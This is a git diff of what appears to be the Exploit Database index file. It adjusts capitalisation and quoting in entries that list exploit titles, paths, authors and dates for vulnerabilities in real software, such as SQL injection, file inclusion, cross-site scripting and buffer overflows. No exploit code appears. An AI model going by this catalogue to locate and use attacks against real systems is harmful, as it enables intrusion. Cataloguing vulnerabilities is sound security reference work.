29916,platforms/linux/dos/29916.c,"Linux Kernel 2.6.x - NETLINK_FIB_LOOKUP Local Denial of Service",2007-04-26,"Alexey Kuznetsov",linux,dos,0 29917,platforms/php/webapps/29917.php,"FlashComs Chat 6.5 - Arbitrary File Upload",2013-11-30,"Miya Chung",php,webapps,0 -29918,platforms/java/webapps/29918.txt,"Ametys CMS 3.5.2 - (lang parameter) XPath Injection",2013-11-30,LiquidWorm,java,webapps,0 +29918,platforms/java/webapps/29918.txt,"Ametys CMS 3.5.2 - (lang Parameter) XPath Injection",2013-11-30,LiquidWorm,java,webapps,0 29919,platforms/hardware/dos/29919.py,"TP-Link TL-WR740N / TL-WR740ND - 150M Wireless Lite N Router HTTP Denial of Service",2013-11-30,"Dino Causevic",hardware,dos,0 29920,platforms/linux/dos/29920.py,"Uptime Agent 5.0.1 - Stack Overflow",2013-11-30,"Denis Andzakovic",linux,dos,0 29921,platforms/php/webapps/29921.py,"Zend-Framework - Full Info Disclosure",2013-11-30,"Ariel Orellana",php,webapps,0 -29922,platforms/windows/local/29922.py,"Kingsoft Office Writer 2012 8.1.0.3385 - (.wps) Buffer Overflow (SEH)",2013-11-30,"Julien Ahrens",windows,local,0 +29922,platforms/windows/local/29922.py,"Kingsoft Office Writer 2012 8.1.0.3385 - '.wps' Buffer Overflow (SEH)",2013-11-30,"Julien Ahrens",windows,local,0 29924,platforms/hardware/webapps/29924.txt,"TP-Link TD-8840t - Cross-Site Request Forgery",2013-11-30,"mohammed al-saggaf",hardware,webapps,0 -29926,platforms/windows/dos/29926.pl,"Audacious Player 3.4.2/3.4.1 - (.mp3) Crash (PoC)",2013-11-30,"Akin Tosunlar",windows,dos,0 +29926,platforms/windows/dos/29926.pl,"Audacious Player 3.4.2/3.4.1 - '.mp3' Crash (PoC)",2013-11-30,"Akin Tosunlar",windows,dos,0 29927,platforms/hardware/webapps/29927.txt,"Scientific-Atlanta_ Inc. DPR2320R2 - Multiple Cross-Site Request Forgery",2013-11-30,sajith,hardware,webapps,0 29929,platforms/asp/webapps/29929.txt,"Burak Yilmaz Blog 1.0 - BRY.asp SQL Injection",2007-04-26,RMx,asp,webapps,0 29930,platforms/multiple/remote/29930.txt,"Apache AXIS 1.0 - Non-Existent WSDL Path Information Disclosure",2007-04-27,jericho+bblog@attrition.org,multiple,remote,0 @@ -27032,12 +27033,12 @@ id,file,description,date,author,platform,type,port 29938,platforms/php/webapps/29938.txt,"E-Annu - home.php SQL Injection",2007-04-30,ilkerkandemir,php,webapps,0 29939,platforms/linux/dos/29939.txt,"X.Org X Window System Xserver 1.3 - XRender Extension Divide by Zero Denial of Service",2007-05-01,"Derek Abdine",linux,dos,0 29940,platforms/windows/dos/29940.html,"Mozilla Firefox 2.0.0.3 - Href Denial of Service",2007-05-01,"Carl Hardwick",windows,dos,0 -29941,platforms/php/webapps/29941.txt,"CMS Made Simple 105 - stylesheet.php SQL Injection",2007-05-02,"Daniel Lucq",php,webapps,0 +29941,platforms/php/webapps/29941.txt,"CMS Made Simple 105 - Stylesheet.php SQL Injection",2007-05-02,"Daniel Lucq",php,webapps,0 29942,platforms/windows/dos/29942.c,"Atomix MP3 Malformed MP3 - File Buffer Overflow",2007-05-02,preth00nker,windows,dos,0 29943,platforms/windows/dos/29943.c,"Progress WebSpeed 3.0/3.1 - Denial of Service",2007-05-02,"Eelko Neven",windows,dos,0 29944,platforms/php/webapps/29944.pl,"PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion",2007-05-03,"ilker Kandemir",php,webapps,0 29945,platforms/hardware/remote/29945.txt,"D-Link DSL-G624T - Var:RelaodHref Cross-Site Scripting",2007-05-03,"Tim Brown",hardware,remote,0 -29946,platforms/php/webapps/29946.txt,"Wordpress Orange Themes - Cross-Site Request Forgery (File Upload)",2013-12-01,"Jje Incovers",php,webapps,0 +29946,platforms/php/webapps/29946.txt,"WordPress Orange Themes - Cross-Site Request Forgery (File Upload)",2013-12-01,"Jje Incovers",php,webapps,0 30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 - content.php SQL Injection",2007-06-18,"Jesper Jurcenoks",php,webapps,0 30198,platforms/asp/webapps/30198.txt,"TDizin - Arama.asp Cross-Site Scripting",2007-06-18,GeFORC3,asp,webapps,0 30199,platforms/cgi/webapps/30199.txt,"WebIf - OutConfig Parameter Local File Inclusion",2007-06-18,maiosyet,cgi,webapps,0 @@ -27049,7 +27050,7 @@ id,file,description,date,author,platform,type,port 29954,platforms/linux/local/29954.txt,"ELinks Relative 0.10.6 - /011.1 Path Arbitrary Code Execution",2007-05-07,"Arnaud Giersch",linux,local,0 29955,platforms/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module - 'index.php' SQL Injection",2007-05-07,Bulan,php,webapps,0 29956,platforms/php/webapps/29956.txt,"ObieWebsite Mini Web Shop 2 - order_form.php PATH_INFO Parameter Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0 -29957,platforms/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 - sendmail.php PATH_INFO Parameter Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0 +29957,platforms/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 - Sendmail.php PATH_INFO Parameter Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0 29958,platforms/asp/webapps/29958.txt,"FipsCMS 2.1 - PID Parameter SQL Injection",2007-05-07,"ilker Kandemir",asp,webapps,0 29959,platforms/hardware/webapps/29959.txt,"TVT TD-2308SS-B DVR - Directory Traversal",2013-12-01,"Cesar Neira",hardware,webapps,0 29960,platforms/php/webapps/29960.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection",2007-05-07,"John Martinelli",php,webapps,0 @@ -27057,7 +27058,7 @@ id,file,description,date,author,platform,type,port 29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 - index.pl Cross-Site Scripting",2007-05-07,ciri,cgi,webapps,0 29963,platforms/php/webapps/29963.txt,"Kayako eSupport 3.0.90 - 'index.php' Cross-Site Scripting",2007-05-07,Red_Casper,php,webapps,0 29964,platforms/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 - SpntSvc.exe Remote Stack Based Buffer Overflow",2007-05-07,MC,windows,remote,0 -29965,platforms/php/webapps/29965.txt,"Advanced GuestBook 2.4.2 - picture.php Cross-Site Scripting",2007-05-08,"Jesper Jurcenoks",php,webapps,0 +29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 - picture.php Cross-Site Scripting",2007-05-08,"Jesper Jurcenoks",php,webapps,0 29966,platforms/php/webapps/29966.txt,"Campsite 2.6.1 - Alias.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29967,platforms/php/webapps/29967.txt,"Campsite 2.6.1 - article.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29968,platforms/php/webapps/29968.txt,"Campsite 2.6.1 - ArticleAttachment.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 @@ -27090,20 +27091,20 @@ id,file,description,date,author,platform,type,port 29998,platforms/php/webapps/29998.txt,"Campsite 2.6.1 - user.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29999,platforms/php/webapps/29999.txt,"Campsite 2.6.1 - UserType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30000,platforms/ios/webapps/30000.txt,"Photo Transfer Wifi 1.4.4 iOS - Multiple Web Vulnerabilities",2013-12-02,Vulnerability-Lab,ios,webapps,0 -30002,platforms/php/webapps/30002.txt,"Wordpress Formcraft Plugin - SQL Injection",2013-12-02,"Ashiyane Digital Security Team",php,webapps,0 -30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 - implementation/management/configuration.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 - implementation/management/db_connect.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - ' LocalizerConfig.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - ' LocalizerLanguage.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +30002,platforms/php/webapps/30002.txt,"WordPress Formcraft Plugin - SQL Injection",2013-12-02,"Ashiyane Digital Security Team",php,webapps,0 +30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 - implementation/Management/configuration.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 - implementation/Management/db_connect.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - 'LocalizerConfig.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30007,platforms/windows/local/30007.txt,"Notepad++ Plugin Notepad 1.5 - Local Exploit",2013-12-03,"Junwen Sun",windows,local,0 30008,platforms/java/remote/30008.rb,"Cisco Prime Data Center Network Manager - Arbitrary File Upload",2013-12-03,Metasploit,java,remote,0 30009,platforms/windows/remote/30009.rb,"ABB MicroSCADA - wserver.exe Remote Code Execution",2013-12-03,Metasploit,windows,remote,12221 30010,platforms/php/remote/30010.rb,"Kimai 0.9.2 - 'db_restore.php' SQL Injection",2013-12-03,Metasploit,php,remote,80 30011,platforms/windows/remote/30011.rb,"Microsoft - Tagged Image File Format (TIFF) Integer Overflow",2013-12-03,Metasploit,windows,remote,0 -30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - (profile.php password0 parameter) SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 -30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - (index.php language parameter) SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 +30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - (profile.php password0 Parameter) SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 +30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - (index.php language Parameter) SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Root Shell Exploit",2013-12-06,0_o,hardware,webapps,0 -30063,platforms/php/webapps/30063.txt,"Wordpress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",php,webapps,0 +30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",php,webapps,0 30064,platforms/php/webapps/30064.txt,"HLstats 1.35 - hlstats.php Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0 30065,platforms/php/webapps/30065.html,"GaliX 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-21,"John Martinelli",php,webapps,0 30066,platforms/php/webapps/30066.txt,"Jetbox CMS 2.1 - Multiple SQL Injections",2007-05-21,"Jesper Jurcenoks",php,webapps,0 @@ -27124,14 +27125,14 @@ id,file,description,date,author,platform,type,port 30081,platforms/php/webapps/30081.txt,"ASP-Nuke 2.0.7 - news.asp Cross-Site Scripting",2007-05-24,vagrant,php,webapps,0 30082,platforms/php/webapps/30082.txt,"GNUTurk - Mods.php Cross-Site Scripting",2007-05-25,vagrant,php,webapps,0 30083,platforms/php/webapps/30083.txt,"BoxBilling 3.6.11 - (mod_notification) Persistent Cross-Site Scripting",2013-12-06,LiquidWorm,php,webapps,0 -30084,platforms/php/webapps/30084.php,"Wordpress page-flip-image-gallery Plugins - Remote File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0 +30084,platforms/php/webapps/30084.php,"WordPress page-flip-image-gallery Plugins - Remote File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0 30086,platforms/php/webapps/30086.txt,"BoastMachine 3.1 - 'index.php' Cross-Site Scripting",2007-05-25,newbinaryfile,php,webapps,0 30087,platforms/php/webapps/30087.txt,"Digirez 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,php,webapps,0 30088,platforms/php/webapps/30088.txt,"Pligg 9.5 - Reset Forgotten Password Security Bypass",2007-05-25,"242th section",php,webapps,0 30089,platforms/linux/remote/30089.txt,"Ruby on Rails 1.2.3 To_JSON - Script Injection",2007-05-25,BCC,linux,remote,0 30091,platforms/linux/dos/30091.py,"OpenOffice 2.2 Writer Component - Remote Denial of Service",2007-05-28,shinnai,linux,dos,0 30095,platforms/php/webapps/30095.txt,"DGNews 1.5.1/2.1 - news.php SQL Injection",2007-05-28,"Jesper Jurcenoks",php,webapps,0 -30096,platforms/osx/local/30096.txt,"Apple Mac OSX 10.4.9 - VPND Local Format String",2007-05-29,"Chris Anley",osx,local,0 +30096,platforms/osx/local/30096.txt,"Apple Mac OS X 10.4.9 - VPND Local Format String",2007-05-29,"Chris Anley",osx,local,0 30097,platforms/php/webapps/30097.txt,"UebiMiau 2.7.10 - demo/pop3/error.php selected_theme Parameter Cross-Site Scripting",2007-05-29,"Michal Majchrowicz",php,webapps,0 30098,platforms/php/webapps/30098.txt,"UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Variable Full Path Disclosure",2007-05-29,"Michal Majchrowicz",php,webapps,0 30099,platforms/php/webapps/30099.txt,"DGNews 2.1 - NewsID Parameter SQL Injection",2007-05-28,"laurent gaffie",php,webapps,0 @@ -27170,7 +27171,7 @@ id,file,description,date,author,platform,type,port 30235,platforms/php/webapps/30235.txt,"KikChat - (Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities",2013-12-12,"cr4wl3r ",php,webapps,0 30237,platforms/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",hardware,local,0 30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection",2013-12-12,GalaxyAndroid,php,webapps,0 -30366,platforms/php/webapps/30366.txt,"AlstraSoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0 +30366,platforms/php/webapps/30366.txt,"Alstrasoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0 30244,platforms/windows/local/30244.py,"Castripper 2.50.70 - '.pls' DEP Exploit",2013-12-12,"Morteza Hashemi",windows,local,0 30284,platforms/linux/remote/30284.vbs,"Sun Java Runtime Environment 1.6 - Web Start JNLP File Stack Buffer Overflow",2007-07-09,"Daniel Soeder",linux,remote,0 30246,platforms/php/webapps/30246.txt,"WHMCS 4.x & 5.x - Multiple Web Vulnerabilities",2013-12-12,"AhwAk20o0 --",php,webapps,0 @@ -27200,7 +27201,7 @@ id,file,description,date,author,platform,type,port 30271,platforms/java/webapps/30271.txt,"OpManager 6/7 - ping.do name Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 30272,platforms/java/webapps/30272.txt,"OpManager 6/7 - traceRoute.do name Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 30273,platforms/java/webapps/30273.txt,"OpManager 6/7 - reports/ReportViewAction.do Multiple Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 -30274,platforms/java/webapps/30274.txt,"OpManager 6/7 - admin/ServiceConfiguration.do operation Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 +30274,platforms/java/webapps/30274.txt,"OpManager 6/7 - admin/ServiceConfiguration.do Operation Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 30275,platforms/java/webapps/30275.txt,"OpManager 6/7 - admin/DeviceAssociation.do Multiple Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 - 'login.php' Multiple Local File Inclusion",2007-07-05,"Adriel T. Desautels",php,webapps,0 30278,platforms/windows/remote/30278.c,"SAP DB 7.x - Web Server WAHTTP.exe Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",windows,remote,0 @@ -27218,7 +27219,7 @@ id,file,description,date,author,platform,type,port 30292,platforms/multiple/remote/30292.pl,"Apple QuickTime 7.1.5 - Information Disclosure / Multiple Code Execution Vulnerabilities",2007-07-11,Wolf,multiple,remote,0 30293,platforms/php/webapps/30293.txt,"Helma 1.5.3 - Search Script Cross-Site Scripting",2007-07-12,"Hanno Boeck",php,webapps,0 30294,platforms/php/webapps/30294.txt,"Inmostore 4.0 - 'index.php' SQL Injection",2007-07-12,Keniobats,php,webapps,0 -30295,platforms/multiple/local/30295.sql,"Oracle Database - SQL Compiler Views Unauthorized Manipulation",2007-07-12,bunker,multiple,local,0 +30295,platforms/multiple/local/30295.sql,"Oracle Database - SQL Compiler Views Unauthorized manipulation",2007-07-12,bunker,multiple,local,0 30296,platforms/asp/webapps/30296.txt,"ActiveWeb Contentserver 5.6.2929 - Picture_Real_Edit.asp SQL Injection",2007-07-13,"RedTeam Pentesting",asp,webapps,0 30297,platforms/asp/webapps/30297.txt,"contentserver 5.6.2929 - errors/rights.asp msg Parameter Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps,0 30298,platforms/asp/webapps/30298.txt,"contentserver 5.6.2929 - errors/transaction.asp msg Parameter Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps,0 @@ -27237,7 +27238,7 @@ id,file,description,date,author,platform,type,port 30389,platforms/php/webapps/30389.txt,"iFoto 1.0 - 'index.php' Directory Traversal",2007-07-25,Lostmon,php,webapps,0 30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 - UserName Parameter SQL Injection",2007-07-26,"Aria-Security Team",php,webapps,0 30391,platforms/php/webapps/30391.txt,"PHPHostBot 1.05 - Authorize.php Remote File Inclusion",2007-07-26,S4M3K,php,webapps,0 -30392,platforms/windows/local/30392.rb,"Microsoft Windows ndproxy.sys - Privilege Escalation",2013-12-17,Metasploit,windows,local,0 +30392,platforms/windows/local/30392.rb,"Microsoft Windows - 'ndproxy.sys' - Privilege Escalation",2013-12-17,Metasploit,windows,local,0 30308,platforms/windows/dos/30308.py,"PotPlayer 1.5.42509 Beta - Denial of Service (Integer Division by Zero Exploit)",2013-12-15,sajith,windows,dos,0 30801,platforms/php/webapps/30801.txt,"Bandersnatch 0.4 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-11-23,"Tim Brown",php,webapps,0 30310,platforms/php/webapps/30310.txt,"Piwigo 2.5.3 CMS - Multiple Web Vulnerabilities",2013-12-15,sajith,php,webapps,0 @@ -27255,7 +27256,7 @@ id,file,description,date,author,platform,type,port 30322,platforms/windows/remote/30322.rb,"Lighttpd 1.4.15 - Multiple Code Execution / Denial of Service / Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",windows,remote,0 30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 - install/upgrade-0-2-3.php PHP_SELF Parameter Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 30324,platforms/php/webapps/30324.txt,"UseBB 1.0.7 - install/upgrade-0-3.php PHP_SELF Parameter Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 -30978,platforms/php/webapps/30978.txt,"Wordpress 2.2.3 - wp-admin/page-new.php popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 +30978,platforms/php/webapps/30978.txt,"WordPress 2.2.3 - wp-admin/page-new.php popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 30327,platforms/asp/webapps/30327.html,"Dora Emlak 1.0 Script - Multiple Input Validation Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 30328,platforms/asp/webapps/30328.txt,"Alisveris Sitesi Scripti - index.asp SQL Injection",2007-07-23,GeFORC3,asp,webapps,0 30329,platforms/php/webapps/30329.sh,"Gitlab 6.0 - Persistent Cross-Site Scripting",2013-12-16,hellok,php,webapps,0 @@ -27263,7 +27264,7 @@ id,file,description,date,author,platform,type,port 30331,platforms/asp/webapps/30331.html,"ASP cvmatik 1.1 - Multiple HTML Injection Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 30332,platforms/asp/webapps/30332.txt,"Image Racer - searchresults.asp SQL Injection",2007-07-23,"Aria-Security Team",asp,webapps,0 30333,platforms/php/webapps/30333.txt,"PHMe 0.0.2 - Function_List.php Local File Inclusion",2007-07-23,You_You,php,webapps,0 -30382,platforms/asp/webapps/30382.txt,"W1L3D4 Philboard 0.3 - W1L3D4_Aramasonuc.asp Cross-Site Scripting",2007-07-25,GeFORC3,asp,webapps,0 +30382,platforms/asp/webapps/30382.txt,"W1L3D4 philboard 0.3 - W1L3D4_Aramasonuc.asp Cross-Site Scripting",2007-07-25,GeFORC3,asp,webapps,0 30378,platforms/php/webapps/30378.txt,"Webbler CMS 3.1.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-07-24,"Adrian Pastor",php,webapps,0 30379,platforms/php/webapps/30379.html,"Webbler CMS 3.1.3 - Mail A Friend Open Email Relay",2007-07-24,"Adrian Pastor",php,webapps,0 30380,platforms/php/webapps/30380.txt,"CPanel 10.9.1 - Resname Parameter Cross-Site Scripting",2007-07-24,"Aria-Security Team",php,webapps,0 @@ -27273,7 +27274,7 @@ id,file,description,date,author,platform,type,port 30803,platforms/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 - Login SQL Injection",2007-11-24,"Aria-Security Team",php,webapps,0 30793,platforms/asp/webapps/30793.txt,"VUNET Mass Mailer - 'default.asp' SQL Injection",2007-11-21,"Aria-Security Team",asp,webapps,0 30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 - 'default.asp' SQL Injection",2007-11-21,The-0utl4w,asp,webapps,0 -30469,platforms/linux/remote/30469.rb,"Red Hat CloudForms Management Engine 5.1 - agent/linuxpkgs Path Traversal",2013-12-24,Metasploit,linux,remote,443 +30469,platforms/linux/remote/30469.rb,"Red Hat CloudForms Management Engine 5.1 - agent/linuxpkgs Directory Traversal",2013-12-24,Metasploit,linux,remote,443 30375,platforms/ios/webapps/30375.txt,"FileMaster SY-IT 3.1 iOS - Multiple Web Vulnerabilities",2013-12-17,Vulnerability-Lab,ios,webapps,0 30358,platforms/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box - Exploit",2013-12-16,"Matt O'Connor",hardware,webapps,0 30792,platforms/php/webapps/30792.html,"Underground CMS 1.x - Search.Cache.Inc.php Backdoor",2007-11-21,D4m14n,php,webapps,0 @@ -27290,20 +27291,20 @@ id,file,description,date,author,platform,type,port 30800,platforms/asp/webapps/30800.html,"FooSun - Api_Response.asp SQL Injection",2007-11-23,flyh4t,asp,webapps,0 30395,platforms/php/dos/30395.txt,"PHP openssl_x509_parse() - Memory Corruption",2013-12-17,"Stefan Esser",php,dos,0 30396,platforms/php/webapps/30396.txt,"Ditto Forensic FieldStation 2013Oct15a - Multiple Vulnerabilities",2013-12-17,"Martin Wundram",php,webapps,80 -30397,platforms/windows/dos/30397.txt,"Windows Kernel win32k.sys - Integer Overflow (MS13-101)",2013-12-17,"Core Security",windows,dos,0 +30397,platforms/windows/dos/30397.txt,"Microsoft Windows Kernel win32k.sys - Integer Overflow (MS13-101)",2013-12-17,"Core Security",windows,dos,0 30398,platforms/php/webapps/30398.txt,"InstantCMS 1.10.3 - Blind SQL Injection",2013-12-17,"High-Tech Bridge SA",php,webapps,80 30399,platforms/aix/local/30399.c,"IBM AIX 5.2/5.3 - Capture Command Local Stack Based Buffer Overflow",2007-07-26,qaaz,aix,local,0 30400,platforms/aix/local/30400.c,"IBM AIX 5.2/5.3 FTP Client - Local Buffer Overflow",2007-07-26,qaaz,aix,local,0 30401,platforms/php/dos/30401.php,"T1lib - intT1_Env_GetCompletePath Buffer Overflow",2007-07-26,r0ut3r,php,dos,0 30402,platforms/asp/webapps/30402.txt,"Nukedit 4.9.x - 'login.asp' Cross-Site Scripting",2007-07-26,d3hydr8,asp,webapps,0 -30403,platforms/php/webapps/30403.txt,"Wordpress WP-FeedStats 2.1 Plugin - HTML Injection",2007-07-26,"David Kierznowski",php,webapps,0 +30403,platforms/php/webapps/30403.txt,"WordPress WP-FeedStats 2.1 Plugin - HTML Injection",2007-07-26,"David Kierznowski",php,webapps,0 30404,platforms/windows/remote/30404.html,"Yahoo! Widgets Engine 4.0.3 - YDPCTL.dll ActiveX Control Buffer Overflow",2007-07-27,Unknown,windows,remote,0 30405,platforms/php/webapps/30405.txt,"Bandersnatch 0.4 - Multiple Input Validation Vulnerabilities",2007-07-27,"Tim Brown",php,webapps,0 30413,platforms/windows/dos/30413.py,"PotPlayer 1.5.40688 - '.avi' File Handling Memory Corruption",2013-12-20,ariarat,windows,dos,0 30408,platforms/php/webapps/30408.txt,"Jenkins 1.523 - Inject Persistent HTML Code",2013-12-18,"Christian Catalano",php,webapps,0 30409,platforms/php/webapps/30409.txt,"SonarQube Jenkins Plugin - Plain Text Password",2013-12-18,"Christian Catalano",php,webapps,0 31463,platforms/asp/webapps/31463.txt,"Iatek Knowledge Base - 'content_by_cat.asp' SQL Injection",2008-03-20,xcorpitx,asp,webapps,0 -31464,platforms/windows/dos/31464.pl,"SurgeMail 3.8 - IMAP LSUB Command Remote Stack Buffer Overflow",2008-03-21,"Leon Juranic",windows,dos,0 +31464,platforms/windows/dos/31464.pl,"Surgemail 3.8 - IMAP LSUB Command Remote Stack Buffer Overflow",2008-03-21,"Leon Juranic",windows,dos,0 31465,platforms/windows/remote/31465.cs,"DotNetNuke 4.8.1 - Default 'ValidationKey' and 'DecriptionKey' Weak Encryption",2008-03-21,"Brian Holyfield",windows,remote,0 31466,platforms/cgi/webapps/31466.txt,"Webutil 2.3/2.7 - 'webutil.pl' Multiple Remote Command Execution Vulnerabilities",2008-03-21,"Zero X",cgi,webapps,0 31467,platforms/php/webapps/31467.txt,"phpMyChat 0.14.5 - 'setup.php3' Cross-Site Scripting",2008-03-22,ZoRLu,php,webapps,0 @@ -27323,7 +27324,7 @@ id,file,description,date,author,platform,type,port 30429,platforms/php/webapps/30429.txt,"phpCoupon - Remote Payment Bypass",2007-07-28,freeprotect.net,php,webapps,0 30430,platforms/linux/dos/30430.txt,"Fail2ban 0.8 - Remote Denial of Service",2007-07-28,"Daniel B. Cid",linux,dos,0 30431,platforms/windows/remote/30431.html,"Baidu Soba Search Bar 5.4 - BaiduBar.dll ActiveX Control Remote Code Execution",2007-07-29,cocoruder,windows,remote,0 -30432,platforms/novell/remote/30432.txt,"Novell GroupWise 6.5 WebAccess - User.Id Parameter Cross-Site Scripting",2007-07-30,0x000000,novell,remote,0 +30432,platforms/novell/remote/30432.txt,"Novell Groupwise 6.5 Webaccess - User.Id Parameter Cross-Site Scripting",2007-07-30,0x000000,novell,remote,0 30433,platforms/php/webapps/30433.txt,"IT!CMS 0.2 - lang-en.php wndtitle Parameter Cross-Site Scripting",2007-07-30,"Aria-Security Team",php,webapps,0 30434,platforms/php/webapps/30434.txt,"IT!CMS 0.2 - menu-ed.php wndtitle Parameter Cross-Site Scripting",2007-07-30,"Aria-Security Team",php,webapps,0 30435,platforms/php/webapps/30435.txt,"IT!CMS 0.2 - titletext-ed.php wndtitle Parameter Cross-Site Scripting",2007-07-30,"Aria-Security Team",php,webapps,0 @@ -27334,9 +27335,9 @@ id,file,description,date,author,platform,type,port 30440,platforms/cgi/webapps/30440.txt,"WebEvent 4.03 - Webevent.cgi Cross-Site Scripting",2007-07-31,d3hydr8,cgi,webapps,0 30441,platforms/windows/remote/30441.html,"BlueSkyChat ActiveX Control 8.1.2 - Buffer Overflow",2007-07-31,"Code Audit Labs",windows,remote,0 30442,platforms/php/webapps/30442.txt,"WebDirector - 'index.php' Cross-Site Scripting",2007-08-01,r0t,php,webapps,0 -30443,platforms/php/webapps/30443.txt,"Wordpress Persuasion Theme 2.x - Arbitrary File Download / File Deletion Exploit",2013-12-23,"Interference Security",php,webapps,80 +30443,platforms/php/webapps/30443.txt,"WordPress Persuasion Theme 2.x - Arbitrary File Download / File Deletion Exploit",2013-12-23,"Interference Security",php,webapps,80 30444,platforms/linux/dos/30444.txt,"KDE Konqueror 3.5.7 - Assert Denial of Service",2007-03-05,"Thomas Waldegger",linux,dos,0 -30445,platforms/php/webapps/30445.txt,"Joomla Tour de France Pool 1.0.1 Module - mosConfig_absolute_path Remote File Inclusion",2007-08-02,Yollubunlar.Org,php,webapps,0 +30445,platforms/php/webapps/30445.txt,"Joomla Tour de France Pool 1.0.1 Module - MosConfig_absolute_path Remote File Inclusion",2007-08-02,Yollubunlar.Org,php,webapps,0 30446,platforms/asp/webapps/30446.txt,"Hunkaray Okul Portali 1.1 - Duyuruoku.asp SQL Injection",2007-08-02,Yollubunlar.Org,asp,webapps,0 30447,platforms/windows/remote/30447.html,"Tor 0.1.2.15 - ControlPort Missing Authentication Unauthorized Access",2007-08-02,anonymous,windows,remote,0 30448,platforms/php/webapps/30448.txt,"LANAI CMS 1.2.14 - FAQ Module mid Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 @@ -27346,15 +27347,15 @@ id,file,description,date,author,platform,type,port 30452,platforms/php/webapps/30452.txt,"J! Reactions 1.8.1 - comPath 